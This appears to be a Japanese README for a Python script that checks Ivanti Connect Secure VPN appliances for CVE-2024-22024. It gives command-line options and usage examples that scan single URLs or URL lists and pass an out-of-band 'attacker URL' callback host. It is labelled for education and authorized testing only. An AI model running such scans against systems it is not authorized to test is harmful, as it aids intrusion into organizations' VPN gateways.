
Ivanti Connect Secure における CVE-2024-22024 脆弱性の確認
[!WARNING] 教育目的および許可されたテスト専用です。
-u または --target_url: 対象の Ivanti Connect Secure (ICS) URL または URL リストを含むファイル。
-c または --attacker_url: 攻撃者側の URL (Burp Collaborator、ngrok、または Webhook.site のユニークな URL を使用して生成)
-t または --timeout: リクエストのタイムアウト(秒)(デフォルトは 3 秒)
単一の URL をテスト:
python .\cve_2024_22024.py -u http://vpn.example.com -c http://potatodynamicdns.oastify.com
URL のリストをテスト:
python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com
異なるタイムアウトを使用(5 秒):
python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com -t 5
脆弱性を発見した方々へ…私は PoC を読んで自動化しただけです。